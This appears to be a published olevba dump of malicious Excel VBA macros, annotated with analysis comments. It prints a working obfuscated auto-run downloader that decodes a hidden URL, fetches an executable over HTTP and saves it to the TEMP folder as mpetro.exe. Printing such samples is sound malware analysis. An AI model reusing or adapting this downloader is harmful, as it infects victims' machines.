dynamoo

Malicious Word macro

Nov 12th, 2015
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V 6134443_101115_141851-01.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 6134443_101115_141851-01.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_Open()
      ' Auto-exec entry point (olevba flags it as AutoExec below). Each call uses a
      ' benign-looking helper name with dummy arguments; in every callee only the
      ' statements before its first Exit/GoTo are reachable, and those statements
      ' together form a download-write-run chain. Read the calls in this order.
  16. Main                  ' fills the Push_* single-character globals used to build strings
  17. DocDatabase           ' creates the four COM objects held in the complex* globals
  18. HasProperty "", ""    ' decodes the URL array and calls Open "GET" on the HTTP object
  19. GetFieldTypeName 0    ' reads the TEMP environment value and calls Send on the HTTP object
  20. FileExists ""         ' builds the drop path and writes responseBody into the stream
  21. DeleteFolder ""       ' saves the stream to the drop path
  22. GetShortName ""       ' passes the drop path to the shell object's Open
  23. End Sub
  24.  
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Ëèñò1.cls
  27. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Ëèñò2.cls
  32. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. (empty macro)
  35. -------------------------------------------------------------------------------
  36. VBA MACRO Ëèñò3.cls
  37. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  39. (empty macro)
  40. -------------------------------------------------------------------------------
  41. VBA MACRO Module1.bas
  42. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
      ' Module-level state shared across the staged calls made from Workbook_Open.
      ' The object names below are the strings the CreateObject concatenations in
      ' DocDatabase resolve to once Main has set the Push_* characters.
  44. Public complexByt As Object   ' set in DocDatabase: "Microsoft.XMLHTTP"
  45. Public complexTex As Object   ' set in DocDatabase: "Adodb.Stream"
  46. Public complexGU  As Object   ' set in DocDatabase: WScript.Shell Environment("Process")
  47. Public complexDoub As String  ' set in GetFieldTypeName: value of the TEMP variable
  48. Public complexSin As String   ' set in FileExists: complexDoub & "\mpetro.exe"
  49. Public complexLon As Object   ' set in DocDatabase: "Shell.Application"
  50. Public Function ExportVBComponent(VBComp As String, _
  51.  FolderName As String, _
  52.  Optional filename As String, _
  53.  Optional OverwriteExisting As Boolean = True) As Boolean
  54. On Error GoTo Err_Handler
  55.  Dim extension As String
  56.  Dim FName As String
  57.  extension = GetFileExtension(VBComp:=VBComp)
  58.  If Trim(filename) = vbNullString Then
  59.  FName = VBComp.Name & extension
  60.  Else
  61.  FName = filename
  62.  If InStr(1, FName, ".", vbBinaryCompare) = 0 Then
  63.  FName = FName & extension
  64.  End If
  65.  End If
  66.  If StrComp(Right(FolderName, 1), "\", vbBinaryCompare) = 0 Then
  67.  FName = FolderName & FName
  68.  Else
  69.  FName = FolderName & "\" & FName
  70.  End If
  71.  If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then
  72.  If OverwriteExisting = True Then
  73.  Kill FName
  74.  Else
  75.  ExportVBComponent = False
  76.  Exit Function
  77.  End If
  78.  End If
  79.  VBComp.Export filename:=FName
  80.  ExportVBComponent = True
  81. Exit_Function:
  82.  Exit Function
  83. Err_Handler:
  84.  Select Case Err.Number
  85.  Case Else
  86.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  87.  "Error encountered (#" & Err.Number & " - ExportVBComponent[mod_Git])"
  88.  End Select
  89.  Resume Exit_Function
  90. End Function
  91. Public Function GetFileExtension(VBComp As String) As String
  92. On Error GoTo Err_Handler
  93.  Select Case VBComp.Type
  94.  Case vbext_ct_ClassModule
  95.  GetFileExtension = ".cls"
  96.  Case vbext_ct_Document
  97.  GetFileExtension = ".cls"
  98.  Case vbext_ct_MSForm
  99.  GetFileExtension = ".frm"
  100.  Case vbext_ct_StdModule
  101.  GetFileExtension = ".bas"
  102.  Case Else
  103.  GetFileExtension = ".bas"
  104.  End Select
  105. Exit_Function:
  106.  Exit Function
  107. Err_Handler:
  108.  Select Case Err.Number
  109.  Case Else
  110.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  111.  "Error encountered (#" & Err.Number & " - GetFileExtension[mod_Git])"
  112.  End Select
  113.  Resume Exit_Function
  114. End Function
  115. Public Sub DocDatabase(Optional path As String = "")
       ' Live part: only the four CreateObject lines before the first "Exit Sub".
       ' Main assigns Push_DT=".", Push_E="E", Push_M="M", Push_P="P", so the
       ' concatenations resolve to "Microsoft.XMLHTTP", "Adodb.Stream",
       ' "Shell.Application" and WScript.Shell's Environment("Process").
       ' Splitting the ProgIDs this way keeps the literal names out of the file;
       ' olevba's table below reports only generic CreateObject/Chr hits.
  116. Set complexByt = CreateObject(Push_M + "icrosoft" + Push_DT + "XMLHTT" + Push_P)
  117. Set complexTex = CreateObject("Adodb" + Push_DT + "Str" + LCase(Push_E) + "a" + LCase(Push_M))
  118. Set complexLon = CreateObject("Sh" + LCase(Push_E) + "ll" + Push_DT + "A" + LCase(Push_P + Push_P) + "lication")
  119. Set complexGU = CreateObject("WScript" + Push_DT + "Sh" + LCase(Push_E) + "ll").Environment(Push_P + "roc" + LCase(Push_E) + "ss")
  120. Exit Sub
       ' Unreachable from here to End Sub. NOTE(review): this looks like an Access
       ' "export database objects" routine used as filler; identifiers are broken
       ' (IsBla.nk, Curr.entDb, mismatched loop variables), so it is presumably
       ' not meant to run. The Suspicious MkDir/Open/Print # hits in olevba's
       ' table come from this dead code, not from the live chain.
  121.  If IsBla.nk(path) Then
  122.  path = Application.CurrentProject.path & "\" & Application.CurrentProject.Name & " - exploded view\"
  123.  End If
  124. On Error Resume Next
  125.  MkDir path
  126.  MkDir path & "\Forms\"
  127.  MkDir path & "\Queries\"
  128.  MkDir path & "\Queries(SQL)\"
  129.  MkDir path & "\Reports\"
  130.  MkDir path & "\Modules\"
  131.  MkDir path & "\Scripts\"
  132. On Error GoTo Err_Handler
  133.  Dim dbs As String
  134.  Dim cnt As String
  135.  Dim doc As String
  136.  Dim i As Integer
  137.   dbs = Curr.entDb()
  138.   cnt = dbssc.Containers("Forms")
  139.  For Each ddvoc In scsc.Documents
  140.  Application.SaveAsText acForm, dodvdc.Name, path & "\Forms\" & dodvdc.Name & ".txt"
  141.  Next ddvoc
  142.   cnt = dbfffs.Containers("Reports")
  143.  For Each docff In cnffft.Documents
  144.  Application.SaveAsText acReport, dofffc.Name, path & "\Reports\" & dofffc.Name & ".txt"
  145.  Next docff
  146.   cnt = dbffs.Containers("Scripts")
  147.  For Each doffc In cnfft.Documents
  148.  Application.SaveAsText acMacro, docff.Name, path & "\Scripts\" & docff.Name & ".txt"
  149.  Next doffc
  150.   cnt = dbsff.Containers("Modules")
  151.  For Each docff In cntff.Documents
  152.  Application.SaveAsText acModule, docff.Name, path & "\Modules\" & docff.Name & ".txt"
  153.  Next docff
  154.  Dim intfile As Long
  155.  Dim filename As String
  156.  For i = 0 To dbsff.QueryDefs.Count - 1
  157.  Application.SaveAsText acQuery, dbffs.QueryDefs(i).Name, path & "\Queries\" & dffbs.QueryDefs(i).Name & ".txt"
  158.  filename = path & "\Queries(SQL)\" & dbffs.QueryDefs(i).Name & ".txt"
  159.  intfile = FreeFile()
  160.  Open filename For Output As #intfile
  161.  Print #intfile, dffbs.QueryDefs(i).Sql
  162.  Close #intfile
  163.  Next i
  164.  
  165. Exit_Sub:
  166.  Debug.Print "Done."
  167.  Exit Sub
  168. Err_Handler:
  169.  Select Case Err.Number
  170.  Case Else
  171.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  172.  "Error encountered (#" & Err.Number & " - DocDatabase[mod_Git])"
  173.  End Select
  174.  Resume Exit_Sub
  175. End Sub
  176. Public Sub RecreateDatabase()
  177. On Error GoTo Err_Handler
  178.  Dim myFile As Object
  179.  Dim folder As Object
  180.  Dim FSO As Object
  181.  Dim objecttype As String, objectname As String
  182.  Dim WScript As Object
  183.  Dim oApplication As Object
  184.  For Each myFile In folder.files
  185.  objecttype = FSO.GetExtensionName(myFile.Name)
  186.  objectname = FSO.GetBaseName(myFile.Name)
  187.  WScript.Echo " " & objectname & " (" & objecttype & ")"
  188.  If (objecttype = "form") Then
  189.  oApplication.LoadFromText acForm, objectname, myFile.path
  190.  ElseIf (objecttype = "bas") Then
  191.  oApplication.LoadFromText acModule, objectname, myFile.path
  192.  ElseIf (objecttype = "mac") Then
  193.  oApplication.LoadFromText acMacro, objectname, myFile.path
  194.  ElseIf (objecttype = "report") Then
  195.  oApplication.LoadFromText acReport, objectname, myFile.path
  196.  ElseIf (objecttype = "sql") Then
  197.  oApplication.LoadFromText acQuery, objectname, myFile.path
  198.  End If
  199.  Next
  200. Exit_Sub:
  201.  Debug.Print "Done."
  202.  Exit Sub
  203. Err_Handler:
  204.  Select Case Err.Number
  205.  Case Else
  206.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  207.  "Error encountered (#" & Err.Number & " - RecreateDatabase[mod_Git])"
  208.  End Select
  209.  Resume Exit_Sub
  210. End Sub
  211. Public Function SetPropertyDAO(obj As Object, strPropertyName As String, intType As Integer, _
  212.  varValue As Variant, Optional strErrMsg As String) As Boolean
  213. On Error GoTo ErrHandler
  214.  If HasProperty(obj, strPropertyName) Then
  215.  obj.Properties(strPropertyName) = varValue
  216.  Else
  217.  obj.Properties.Append obj.CreateProperty(strPropertyName, intType, varValue)
  218.  End If
  219.  SetPropertyDAO = True
  220. ExitHandler:
  221.  Exit Function
  222. ErrHandler:
  223.  strErrMsg = strErrMsg & obj.Name & "." & strPropertyName & " not set to " & _
  224.  varValue & ". Error encountered (#" & Err.Number & " - SetPropertyDAO[mod_Git])" & _
  225.  Err.Number & " - " & Err.Description & vbCrLf
  226.  Resume ExitHandler
  227. End Function
  228. Public Function HasProperty(obj As String, strPropName As String) As Boolean
       ' Stage 2 of the chain started by Workbook_Open: prepares the HTTP request.
       ' vidak holds the download URL as numbers; GetStringFromArray(vidak, 38)
       ' subtracts 2 * 38 = 76 from each element to get a character code. The
       ' first four elements (180, 192, 192, 188) give "http" and the last four
       ' (122, 177, 196, 177) give ".exe". The URL never appears as a string
       ' literal, so olevba's IOC rows below do not list it.
       ' The third Open argument is False, i.e. a synchronous request.
  229.  Dim varDummy As Variant
  230.  Dim vidak() As Variant
  231. On Error Resume Next
  232. vidak = Array(180, 192, 192, 188, 134, 123, 123, 191, 173, 186, 187, 183, 187, 122, 182, 188, 123, 129, 192, 129, 128, 130, 129, 126, 127, 123, 184, 180, 178, 127, 178, 127, 127, 128, 178, 122, 177, 196, 177)
  233. complexByt.Open "GET", GetStringFromArray(vidak, 38), False
  234.  Exit Function
       ' Unreachable: remnant of the property-probe helper whose name is reused.
  235.  varDummy = obffj.Properties(strPropName)
  236.  HasProperty = (Err.Number = 0)
  237. End Function
  238. Public Function GetDescriptions(db As String) As String
  239. On Error Resume Next
  240.  Dim Catalog As AccessObject
  241.  Dim dsc As String
  242.  Dim tbl As AccessObject
  243.  Dim tabledefs As Collection
  244.  Set Catalog = CreateObject("ADOX.Catalog")
  245.  Catalog.ActiveConnection = "Provider=Microsoft.Jet.OLEDB.4.0;" & _
  246.  "Data Source=\" & db & ""
  247.  For Each tbl In Catalog.Tables
  248.  Debug.Print tbl.Name
  249.  Next
  250.  dsc = Catalog.Tables("table_name").Columns("column_name").Properties("Description").value
  251.  For Each tbl In tabledefs
  252.  Debug.Print tbl.Name
  253.  Next
  254.  GetDescriptions = dsc
  255.  Set Catalog = Nothing
  256. End Function
  257. Function TableInfo(strTableName As String)
  258. On Error GoTo TableInfoErr
  259.  Dim db As DAO.Database
  260.  Dim tdf As DAO.TableDef
  261.  Dim fld As String
  262.  Set db = CurrentDb()
  263.  Set tdf = db.tabledefs(strTableName)
  264.  Debug.Print "FIELD NAME", "FIELD TYPE", "SIZE", "DESCRIPTION"
  265.  Debug.Print "==========", "==========", "====", "==========="
  266.  For Each fld In tdf.Fields
  267.  Debug.Print fld.Name,
  268.  Debug.Print FieldTypeName(fld),
  269.  Debug.Print fld.Size,
  270.  Debug.Print GetDescrip(fld)
  271.  Next
  272.  Debug.Print "==========", "==========", "====", "==========="
  273. TableInfoExit:
  274.  Set db = Nothing
  275.  Exit Function
  276. TableInfoErr:
  277.  Select Case Err
  278.  Case 3265&
  279.  MsgBox strTableName & " table doesn"
  280.  Case Else
  281.  Debug.Print "TableInfo() Error " & Err & ": " & Error
  282.  End Select
  283.  Resume TableInfoExit
  284. End Function
  285. Function GetDescrip(obj As Object) As String
  286.  On Error Resume Next
  287.  GetDescrip = obj.Properties("Description")
  288. End Function
  289. Function FieldTypeName(fld As String) As String
  290. On Err GoTo Err_Handler
  291.  Dim strReturn As String
  292.  Select Case CLng(fld.Type)
  293.  Case dbBoolean: strReturn = "Yes/No"
  294.  Case dbByte: strReturn = "Byte"
  295.  Case dbInteger: strReturn = "Integer"
  296.  Case dbLong
  297.  If (fld.attributes And dbAutoIncrField) = 0& Then
  298.  strReturn = "Long Integer"
  299.  Else
  300.  strReturn = "AutoNumber"
  301.  End If
  302.  Case dbCurrency: strReturn = "Currency"
  303.  Case dbSingle: strReturn = "Single"
  304.  Case dbDouble: strReturn = "Double"
  305.  Case dbDate: strReturn = "Date/Time"
  306.  Case dbBinary: strReturn = "Binary"
  307.  Case dbText
  308.  If (fld.attributes And dbFixedField) = 0& Then
  309.  strReturn = "Text"
  310.  Else
  311.  strReturn = "Text (fixed width)"
  312.  End If
  313.  Case dbLongBinary: strReturn = "OLE Object"
  314.  Case dbMemo
  315.  If (fld.attributes And dbHyperlinkField) = 0& Then
  316.  strReturn = "Memo"
  317.  Else
  318.  strReturn = "Hyperlink"
  319.  End If
  320.  Case dbGUID: strReturn = "GUID"
  321.  Case dbBigInt: strReturn = "Big Integer"
  322.  Case dbVarBinary: strReturn = "VarBinary"
  323.  Case dbChar: strReturn = "Char"
  324.  Case dbNumeric: strReturn = "Numeric"
  325.  Case dbDecimal: strReturn = "Decimal"
  326.  Case dbFloat: strReturn = "Float"
  327.  Case dbTime: strReturn = "Time"
  328.  Case dbTimeStamp: strReturn = "Time Stamp"
  329.  Case 101&: strReturn = "Attachment"
  330.  Case 102&: strReturn = "Complex Byte"
  331.  Case 103&: strReturn = "Complex Integer"
  332.  Case 104&: strReturn = "Complex Long"
  333.  Case 105&: strReturn = "Complex Single"
  334.  Case 106&: strReturn = "Complex Double"
  335.  Case 107&: strReturn = "Complex GUID"
  336.  Case 108&: strReturn = "Complex Decimal"
  337.  Case 109&: strReturn = "Complex Text"
  338.  Case Else: strReturn = "Field type " & fld.Type & " unknown"
  339.  End Select
  340.  FieldTypeName = strReturn
  341. Exit_Function:
  342.  Exit Function
  343. Err_Handler:
  344.  Select Case Err.Number
  345.  Case Else
  346.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  347.  "Error encountered (#" & Err.Number & " - FieldTypeName[mod_Git])"
  348.  End Select
  349.  Resume Exit_Function
  350. End Function
  351. Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
       ' String decoder for the numeric arrays in this module.
       ' Each output character is Chr(element - 2 * LenLen - i * 0.01), where i is
       ' the element index. For the only caller visible here (HasProperty,
       ' LenLen = 38, 39 elements) the offset is 76 and the i * 0.01 term stays
       ' below 0.5; NOTE(review): that term presumably vanishes when Chr coerces
       ' its argument to an integer and exists only to hide the simple offset.
       ' For triage, applying "element - 76" statically recovers the string
       ' without running the macro.
  352.  Dim i As Integer
  353.  Dim result As String
  354.  result = ""
  355.  For i = LBound(fromArr) To UBound(fromArr)
  356.   result = result & Chr(fromArr(i) - 2 * LenLen - i * 0.01)
  357.  Next i
  358.  GetStringFromArray = result
  359. End Function
  360. Function GetFieldTypeName(fld As Integer) As String
       ' Stage 3 of the chain started by Workbook_Open: sends the HTTP request.
       ' The unconditional "GoTo Exit_Function" below skips the whole Select Case,
       ' so the field-type table is never evaluated; the only statements that
       ' run are the two placed under the Exit_Function label.
  361. On Err GoTo Err_Handler
  362.  Dim strReturn As String
  363.  GoTo Exit_Function
       ' Skipped filler (DAO field-type name lookup).
  364.  Select Case CLng(fld)
  365.  Case dbBoolean, 1: strReturn = "Yes/No"
  366.  Case dbByte, 2: strReturn = "Byte"
  367.  Case dbInteger, 3: strReturn = "Integer"
  368.  Case dbLong, 4
  369.  strReturn = "Long Integer"
  370.  Case dbCurrency, 5: strReturn = "Currency"
  371.  Case dbSingle, 6: strReturn = "Single"
  372.  Case dbDouble, 7: strReturn = "Double"
  373.  Case dbDate, 8: strReturn = "Date/Time"
  374.  Case dbBinary, 9: strReturn = "Binary"
  375.  Case dbText, 10
  376.  strReturn = "Text"
  377.  Case dbLongBinary, 11: strReturn = "OLE Object"
  378.  Case dbMemo, 12
  379.  strReturn = "Memo"
  380.  Case dbGUID, 15: strReturn = "GUID"
  381.  Case dbBigInt, 16: strReturn = "Big Integer"
  382.  Case dbVarBinary, 17: strReturn = "VarBinary"
  383.  Case dbChar, 18: strReturn = "Char"
  384.  Case dbNumeric, 19: strReturn = "Numeric"
  385.  Case dbDecimal, 20: strReturn = "Decimal"
  386.  Case dbFloat, 21: strReturn = "Float"
  387.  Case dbTime, 22: strReturn = "Time"
  388.  Case dbTimeStamp, 23: strReturn = "Time Stamp"
  389.  Case 101&: strReturn = "Attachment"
  390.  Case 102&: strReturn = "Complex Byte"
  391.  Case 103&: strReturn = "Complex Integer"
  392.  Case 104&: strReturn = "Complex Long"
  393.  Case 105&: strReturn = "Complex Single"
  394.  Case 106&: strReturn = "Complex Double"
  395.  Case 107&: strReturn = "Complex GUID"
  396.  Case 108&: strReturn = "Complex Decimal"
  397.  Case 109&: strReturn = "Complex Text"
  398.  Case Else: strReturn = "Field type " & fld & " unknown"
  399.  End Select
  400.  GetFieldTypeName = strReturn
  401. Exit_Function:
       ' Live statements. "T" + Push_E + Push_M + Push_P is "TEMP" with the values
       ' Main assigns, so complexDoub receives the process TEMP directory.
       ' Send issues the GET prepared in HasProperty; this is the point where
       ' the Office process makes its outbound HTTP connection.
  402. complexDoub = complexGU("T" + Push_E + Push_M + Push_P)
  403. complexByt.Send
  404.  Exit Function
  405. Err_Handler:
  406.  Select Case Err.Number
  407.  Case Else
  408.  MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
  409.  "Error encountered (#" & Err.Number & " - GetFieldTypeName[mod_Git])"
  410.  End Select
  411.  Resume Exit_Function
  412. End Function
  413.  
  414.  
  415.  
  416.  
  417. -------------------------------------------------------------------------------
  418. VBA MACRO Module2.bas
  419. in file: 6134443_101115_141851-01.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  420. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
       ' Building blocks for the string obfuscation: one base constant plus five
       ' single-character globals that Main fills with Chr(PushUp_50 + offset).
       ' Module1 splices them into ProgIDs, the "TEMP" variable name and the
       ' dropped file name.
  421. Public Const PushUp_50 = 50
  422. Public Push_E As String   ' "E" after Main runs
  423. Public Push_M As String   ' "M" after Main runs
  424. Public Push_T As String   ' "T" after Main runs
  425. Public Push_P As String   ' "P" after Main runs
  426. Public Push_DT As String  ' "." after Main runs
  427. Public Sub Main()
       ' Stage 0 of the chain started by Workbook_Open: derives the characters
       ' that the other stages use so that no sensitive string appears whole.
  428. Push_DT = Chr(PushUp_50 - 4)                  ' Chr(46) = "."
  429. Push_E = Chr(PushUp_50 + 19)                  ' Chr(69) = "E"
  430. Push_M = Chr(PushUp_50 + 19 + 8)              ' Chr(77) = "M"
  431. Push_P = Chr(PushUp_50 + 19 + 8 + 3)          ' Chr(80) = "P"
  432. Push_T = Chr(PushUp_50 + 19 + 8 + 3 + 4)      ' Chr(84) = "T"
  433. Exit Sub
       ' Unreachable filler. The "SciLexer.dll" IOC row in olevba's table below
       ' comes from this dead line, so it is not evidence of what the macro
       ' loads; the file the live chain writes is named in FileExists.
  434.  Dim h As Long
  435.  h = LoadLi.brary(App.path & "\SciLexer.dll")
  436.  frmRabcd.Show
  437. End Sub
  438. Function cveScan(fPath As String) As String
       ' Not called from Workbook_Open in this listing. The body is a substring
       ' matcher: each entry is "label:kw1,kw2,...", and a label is reported only
       ' when every keyword occurs in the file read from fPath (case-insensitive
       ' InStr). Passing "cvelist" returns the table itself.
       ' NOTE(review): the CVE labels are inert text used as match names; their
       ' presence in this workbook does not show that any of them is exploited.
       ' Presumably included as filler to pad the module.
  439.  Dim cves() As String
  440.  Dim hits As Long
  441.  Dim ret() As String
  442.  push cves, "accesses capabilities:capabilities"
  443.  push cves, "accesses loader:loader"
  444.  push cves, "accesses params:parameters"
  445.  push cves, "CVE-2015-5122:opaqueBackground"
  446.  push cves, "CVE-2015-3113:play,info,code,video,attachNetStream"
  447.  push cves, "CVE-2015-0556:copyPixelsToByteArray"
  448.  push cves, "CVE-2015-0313:createMessageChannel,createWorker"
  449.  push cves, "CVE-2015-0310 or CVE-2013-0634:new RegExp"
  450.  push cves, "CVE-2015-0311:domainMemory,uncompress"
  451.  push cves, "CVE-2014-9163:parseFloat"
  452.  push cves, "CVE-2014-0515 (if in while loop):byteCode,Shader"
  453.  push cves, "CVE-2014-0502:setSharedProperty,createWorker,.start,SharedObject"
  454.  push cves, "CVE-2014-0497:writeUTFBytes,domainMemory"
  455.  push cves, "CVE-2012-0779:defaultObjectEncoding,AMF0,NetConnection"
  456.  push cves, "CVE-2012-0754:NetStream,NetConnection,attachNetStream,play"
  457.  push cves, "CVE-2012-5054:Matrix3D"
  458.  push cves, "CVE-2012-0779:Responder,NetConnection,AMF0"
  459.  push cves, "CVE-2012-1535:FontDescription,FontLookup"
  460.  push cves, "CVE-2011-0609:MovieClip,TimelineMax,TweenMax"
  461.  push cves, "CVE-2011-2110:Number(_args["
  462.  push cves, "Loads embedded flash object:loadbytes"
  463.  If fPath = "cvelist" Then
  464.  cveScan = ";there are more than this, these are some I had on hand" & vbCrLf & _
  465.  ";that were agreeable to script level detections. " & vbCrLf & _
  466.  vbCrLf & Join(cves, vbCrLf)
  467.  Exit Function
  468.  End If
  469.  If Not FileExists(fPath) Then Exit Function
  470.  dat = ReadFile(fPath)
  471.  For Each CVE In cves
  472.  c = Split(CVE, ":")
  473.  checks = Split(c(1), ",")
  474.  hits = 0
  475.  For Each k In checks
  476.  If InStr(1, dat, k, vbTextCompare) > 0 Then hits = hits + 1
  477.  Next
  478.  If hits = UBound(checks) + 1 Then push ret, CVE
  479.  Next
  480.  If Not AryIsEmpty(ret) Then
  481.  cveScan = "File: " & FileNameFromPath(fPath) & vbCrLf & vbTab & Join(ret, vbCrLf & vbTab) & vbCrLf & "--------------------------------" & vbCrLf
  482.  End If
  483. End Function
  484. Public Function FileExists(path As String) As Boolean
       ' Stage 4 of the chain started by Workbook_Open, interleaved with the
       ' original file-existence helper so the two are hard to tell apart.
       ' Payload statements: the complexTex.* calls and the complexSin assignment.
       ' Workbook_Open passes "", so after the payload lines Len(tmp) = 0 and the
       ' function exits before the Dir check. Any error jumps to "hell" and
       ' returns False without surfacing to the user.
  485.  On Error GoTo hell
  486.  complexTex.Type = 1       ' ADODB stream type 1 = binary
  487.  Dim tmp As String
       ' With Main's Push_* values this is complexDoub & "\mpetro.exe", i.e. an
       ' executable in the TEMP directory read in GetFieldTypeName. olevba's
       ' table only shows the fragment "e" + "xe" from this line.
  488.  complexSin = "" + complexDoub + "\" + LCase(Push_M) + "" + LCase(Push_P) + LCase(Push_E) + LCase(Push_T) + "ro" + LCase(Push_DT) + "e" + "xe"
  489.  tmp = Replace(path, "", Empty)
  490.  complexTex.Open
  491.  tmp = Replace(tmp, """", Empty)
  492.  complexTex.write complexByt.responseBody   ' HTTP response bytes copied into the stream
  493.  If Len(tmp) = 0 Then Exit Function
  494.  If Dir(tmp, vbHidden Or vbNormal Or vbReadOnly Or vbSystem) <> "" Then FileExists = True
  495.  Exit Function
  496. hell: FileExists = False
  497. End Function
  498. Sub push(ary, value)
  499.  On Error GoTo init
  500.  Dim x As Long
  501.  x = UBound(ary)
  502.  ReDim Preserve ary(UBound(ary) + 1)
  503.  ary(UBound(ary)) = value
  504.  Exit Sub
  505. init: ReDim ary(0): ary(0) = value
  506. End Sub
  507. Function FolderExists(path As String) As Boolean
  508.  If Len(path) = 0 Then Exit Function
  509.  If Dir(path, vbDirectory) <> "" Then FolderExists = True
  510. End Function
  511. Function GetParentFolder(path) As String
  512.  If Len(path) = 0 Then Exit Function
  513.  Dim tmp() As String
  514.  Dim ub As String
  515.  tmp = Split(path, "\")
  516.  ub = tmp(UBound(tmp))
  517.  GetParentFolder = Replace(Join(tmp, "\"), "\" & ub, "")
  518. End Function
  519. Function GetBaseName(path As String) As String
  520.  Dim tmp() As String
  521.  Dim ub As String
  522.  tmp = Split(path, "\")
  523.  ub = tmp(UBound(tmp))
  524.  If InStr(1, ub, ".") > 0 Then
  525.  GetBaseName = Mid(ub, 1, InStrRev(ub, ".") - 1)
  526.  Else
  527.  GetBaseName = ub
  528.  End If
  529. End Function
  530. Function FileNameFromPath(fullpath) As String
  531.  If InStr(fullpath, "\") > 0 Then
  532.  tmp = Split(fullpath, "\")
  533.  FileNameFromPath = CStr(tmp(UBound(tmp)))
  534.  End If
  535. End Function
  536. Function GetFolderFiles(folderPath As String, Optional filter As String = "*", Optional retFullPath As Boolean = True, Optional recursive As Boolean = False) As String()
  537.  Dim fnames() As String
  538.  Dim fs As String
  539.  Dim folders() As String
  540.  Dim i As Integer
  541.  If Not FolderExists(folderPath) Then
  542.  GetFolderFiles = fnames()
  543.  Exit Function
  544.  End If
  545.  folderPath = IIf(Right(folderPath, 1) = "\", folderPath, folderPath & "\")
  546.  fs = Dir(folderPath & filter, vbHidden Or vbNormal Or vbReadOnly Or vbSystem)
  547.  While fs <> ""
  548.  If fs <> "" Then push fnames(), IIf(retFullPath = True, folderPath & fs, fs)
  549.  fs = Dir()
  550.  Wend
  551.  If recursive Then
  552.  folders() = GetSubFolders(folderPath)
  553.  If Not AryIsEmpty(folders) Then
  554.  For i = 0 To UBound(folders)
  555.  FolderEngine folders(i), fnames(), filter
  556.  Next
  557.  End If
  558.  If Not retFullPath Then
  559.  For i = 0 To UBound(fnames)
  560.  fnames(i) = Replace(fnames(i), folderPath, Empty)
  561.  Next
  562.  End If
  563.  End If
  564.  GetFolderFiles = fnames()
  565. End Function
  566. Private Sub FolderEngine(fldrpath As String, ary() As String, Optional filter As String = "*")
  567.  Dim files() As String
  568.  Dim folders() As String
  569.  Dim i As Long
  570.  files = GetFolderFiles(fldrpath, filter)
  571.  folders = GetSubFolders(fldrpath)
  572.  If Not AryIsEmpty(files) Then
  573.  For i = 0 To UBound(files)
  574.  push ary, files(i)
  575.  Next
  576.  End If
  577.  If Not AryIsEmpty(folders) Then
  578.  For i = 0 To UBound(folders)
  579.  FolderEngine folders(i), ary, filter
  580.  Next
  581.  End If
  582. End Sub
  583. Public Function DeleteFolder(folderPath As String, Optional force As Boolean = True) As Boolean
       ' Stage 5 of the chain started by Workbook_Open: despite the name, the
       ' reachable code deletes nothing. It writes the stream filled in
       ' FileExists to the path held in complexSin; option 2 asks SaveToFile to
       ' overwrite an existing file. This is the "SaveToFile" row in olevba's
       ' table. Errors jump to "failed" and are swallowed.
  584.  On Error GoTo failed
  585.  complexTex.savetofile complexSin, 2
  586.  Exit Function
       ' Unreachable: the original recursive-delete body.
  587.  Call delTree(folderPath, force)
  588.  RmDir folderPath
  589.  DeleteFolder = True
  590.  Exit Function
  591. failed: DeleteFolder = False
  592. End Function
  593. Private Sub delTree(folderPath As String, Optional force As Boolean = True)
  594.  Dim sfi() As String, sfo() As String, i As Integer
  595.  sfi() = GetFolderFiles(folderPath)
  596.  sfo() = GetSubFolders(folderPath)
  597.  If Not AryIsEmpty(sfi) And force = True Then
  598.  For i = 0 To UBound(sfi)
  599.  DeleteFile sfi(i)
  600.  Next
  601.  End If
  602.  If Not AryIsEmpty(sfo) And force = True Then
  603.  For i = 0 To UBound(sfo)
  604.  Call DeleteFolder(sfo(i), True)
  605.  Next
  606.  End If
  607. End Sub
  608. Function DeleteFile(fPath As String) As Boolean
  609.  On Error GoTo hadErr
  610.  Dim attributes As VbFileAttribute
  611.  attributes = GetAttr(fPath)
  612.  If (attributes And vbReadOnly) Then
  613.  attributes = attributes - vbReadOnly
  614.  SetAttr fPath, attributes
  615.  End If
  616.  Kill fPath
  617.  DeleteFile = True
  618.  Exit Function
  619. hadErr:
  620. DeleteFile = False
